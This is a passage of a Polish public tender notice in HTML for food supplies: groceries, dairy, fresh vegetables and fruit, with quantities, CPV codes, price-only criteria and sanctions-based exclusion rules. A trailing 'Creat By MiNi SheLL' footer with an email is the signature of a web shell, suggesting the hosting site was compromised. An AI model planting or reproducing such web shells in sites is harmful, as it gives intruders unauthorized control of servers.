20<br/>15	marchew mrożona	opakowanie 20 kg	kg	24 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 6 RÓŻNE PRODUKTY SPOŻYWCZE<br/>1	olej rzepakowy	opakowanie 1l	szt.	272<br/>2	ketchup 120g pomidorów	opakowanie 0,9l	szt.	40<br/>3	rodzynki	opakowanie 200g	szt.	40<br/>4	ryż brązowy	opakowanie 1 kg	kg	12<br/>5	makaron pełnoziarnisty	opakowanie 1 kg	kg	20<br/>6	kasza gryczana	opakowanie 1 kg	kg	28<br/>7	płatki owsiane	opakowanie 1 kg	kg	28<br/>8	kasza pęczak	opakowanie 1 kg	kg	20<br/>9	papryka konserwowa	opakowanie 500g	szt.	28<br/>10	soczewica	opakowanie 1 kg	kg	6<br/>11	cukier	opakowanie 1kg	kg	480<br/>12	cukier puder	opakowanie 0,5kg	kg	12<br/>13	cukier wanilinowy	opakowanie 1kg	kg	1,2<br/>14	groszek konserwowy	opakowanie 400g	szt.	20<br/>15	herbata SAGA	opakowanie 100g	szt.	120<br/>16	kakao Decomoreno	opakowanie 200g	szt.	44<br/>17	kasza jęczmienna	wiejska gruba	kg	60<br/>18	kawa INKA	opakowanie 100g	szt.	40<br/>19	koncentrat pomidorowy 30%	opakowanie słój 0,9l	szt.	40<br/>20	kwasek cytrynowy	opakowanie 1kg	kg	0,8<br/>21	majeranek otarty	opakowanie 1kg	kg	2<br/>22	majonez pomorski	opakowanie pow.600g	szt.	100<br/>23	makaron z pszenicy durum	świderki, muszelki, rurki opakowanie 1kg	kg	140<br/>24	mąka luksusowa	opakowanie 1kg	kg	240<br/>25	musztarda sarepska	opakowanie słój 0,9l	szt.	24<br/>26	ocet 10%	opak. butelka 0,5l	szt.	24<br/>27	ogórek konserwowy	opakowanie słój 0,9l	szt.	64<br/>28	ryż długoziarnisty	opakowanie 1kg	kg	60<br/>29	sól	opakowanie 1kg	kg	60<br/>30	sól o obniżonej zawartości sodu kg	20<br/>31	sok owocowy w kartoniku	typu LEON 200 ml	szt.	600<br/>32	pieprz czarny mielony	opakowanie 1kg	kg	4<br/>33	liść laurowy	opakowanie 1kg	kg	0,8<br/>34	kukurydza konserwowa	opakowanie 400ml	szt.	24<br/>35	ziele angielskie kg	1<br/>36	bazylia	opakowanie 50g	szt.	2<br/>37	lubczyk	opakowanie 50g	szt.	40<br/>38	oregano	opakowanie 50g	szt.	12<br/>39	pieprz ziołowy	opakowanie 50g	szt.	8<br/>40	rozmaryn	opakowanie 50g	szt.	2<br/>41	natka pietruszki suszona	opakowanie 50g	szt.	12<br/>42	tymianek	opakowanie 50g	szt.	2<br/>43	chrzan tarty z kwas.	opak. słoik 330g	szt.	20<br/>44	cynamon mielony	opakowanie 50g	szt.	4<br/>45	papryka słodka mielona	opakowanie 1kg	kg	1,2<br/>46	zioła prowansalskie	opakowanie 50g	szt.	4<br/>47	kasza kuskus	opakowanie 1 kg	szt.	8<br/>48	kasza jaglana	opakowanie 1 kg	szt.	8<br/>49	kasza manna	opakowanie 1 kg	kg	8<br/>50	płatki kukurydziane 0,5 kg	corn flakes lub równoważne	kg	60<br/>51	słonecznik łuskany	opakowanie 1 kg	szt.	1<br/>52	sezam	opakowanie 1 kg	szt.	1<br/>53	miód wielokwiatowy	1kg	szt.	40<br/>54	dżem niskosłodzony	1 kg	kg	20<br/>55	czekolada	70% cacao	szt.	120<br/>56	kisiel wiśniowy bez cukru	szt.	40<br/>57	mąka ziemniaczana	opakowanie 1 kg	szt.	2<br/>58	kminek (rzymski)	w ziarnach	kg	0,5<br/>59	kolendra	mielona	kg	0,5<br/>60	żur zakwas	litr	16<br/>61	ocet jabłkowy	opakowanie 0,5 litra	szt.	5<br/>62	pestki dyni łuskane	kg	1<br/>63	pieprz biały mielony	szt.	4<br/>64	kurkuma	mielona	szt.	4<br/>65	imbir mielony	szt.	2<br/>66	biszkopty typu domowe	duże opak np. 0,5 kg	szt.	8<br/>67	chrupki kukurydziane	75 g	szt.	40<br/>68	woda mineralna opakowanie 1,5 litra	szt.	40<br/>69	śliwka suszona	opakowanie 1 kg	kg	1<br/>70	galaretka owocowa szt.	20<br/>71	budyń wanilinowy szt.	40<br/>72	grzyby suszone opakowanie 100g	szt.	2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 7 MLEKO I PRODUKTY MLECZARSKIE<br/>1	mleko 2%	worki foliowe 1 l	l	3100<br/>2	masło extra	kostka 0,2 kg 82% tł.	kg	530<br/>3	ser topiony zegar	200 g typu Hochland	szt.	240<br/>4	kefir	330g	szt.	100<br/>5	serek wiejski z owocami	kubek 150g	szt.	1100<br/>6	jogurt naturalny	kubek 150g	szt.	2600<br/>7	ser biały	twaróg półtłusty krajanka	kg	320<br/>8	ser żółty pełnotłusty	SALAMI,GOUDA 26% tłuszczu	kg	360<br/>9	śmietana ukwaszona	kubek 400g 18%	szt.	100<br/>10	śmietana słodka	UHT 12% karton 0,5l	szt.	350<br/>11	serek homogenizowany	waniliowy 140 g	szt.	400<br/>12	jogurt naturalny kubek 400 g	szt.	48<br/>13	jogurt naturalny typu greckiego	kubek 400g szt.	200<br/>14	śmietana 30%	kubek 0,4l	szt. 7 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 8 ŚWIEŻE WARZYWA I OWOCE<br/>1.	buraki czerwone kg	320<br/>2.	cebula kg	240<br/>3.	czosnek kg	3<br/>4.	kapusta biała kg	320<br/>5.	kapusta czerwona kg	120<br/>6.	kapusta kiszona kg	200<br/>7.	seler korzeń kg	120<br/>8.	marchew kg	440<br/>9.	pietruszka korzeń kg	60<br/>10.	por kg	120<br/>11	cebula czerwona kg	8<br/>12	szczypior pęczek	200<br/>13	sałata główka	120<br/>14	rzodkiewka pęczek	80<br/>15	ogórek świeży kg	160<br/>16	ogórek kiszony kg	120<br/>17	pieczarka świeża kg	60<br/>18	papryka czerwona świeża kg 44<br/>19	pomidor kg	140<br/>20	fasola Jaś kg	100<br/>21	groch łuskany kg	32<br/>22	ziemniaki kg	4500<br/>23	banany kg	400<br/>24	mandarynka kg	120<br/>25	pomarańcza kg	220<br/>26	cytryna kg	20<br/>27	kiwi kg	15<br/>28	jabłka kg	480<br/>29	kapusta pekińska kg	120<br/>30	gruszka kg	40<br/>31	koper świeży pęczek	40<br/>32	kalafior świeży szt.	40<br/>33	pietruszka natka pęczek	40<br/>34	nektaryna kg	20<br/>35	winogrono kg	20<br/>36	dynia	sezon tylko X-XI	kg	40 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331100-8 - Warzywa świeże lub mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/> 1. Nie podlegają wykluczeniu.<br/> Za spełniający ten warunek zamawiający uzna wykonawców , którzy złożą oświadczenie o braku podstaw do <br/> wykluczenia z postępowania, o których mowa w art. 108 ust.1 ustawy Pzp według wzoru stanowiącego załącznik <br/> nr 4 do niniejszej specyfikacji.<br/> 2. Spełniają warunki udziału w postępowaniu dotyczące:<br/>•	zdolności do występowania w obrocie gospodarczym,<br/>•	uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów,<br/>•	sytuacji ekonomicznej lub finansowej,<br/>•	zdolności technicznej lub zawodowej.<br/> Za spełniający ten warunek zamawiający uzna wykonawców, którzy złożą oświadczenie o spełnianiu wymagań <br/> określonych według wzoru stanowiącego załącznik nr 3 do niniejszej specyfikacji. <br/> 3.Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie <br/> przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/> Zamawiający wyklucza z udziału w niniejszym postępowaniu:<br/>a)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>b)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>c)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z <br/>dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku podstaw do wykluczenia określonych w art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13.04.2022r. według wzoru stanowiącego załącznik nr 4 do niniejszej specyfikacji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnianiu wymagań, według wzoru stanowiącego załącznik nr 3 do specyfikacji warunków zamówienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-29 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem Platformy e-Zamówienia zgodnie z Rozdziałem XIV specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-29 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com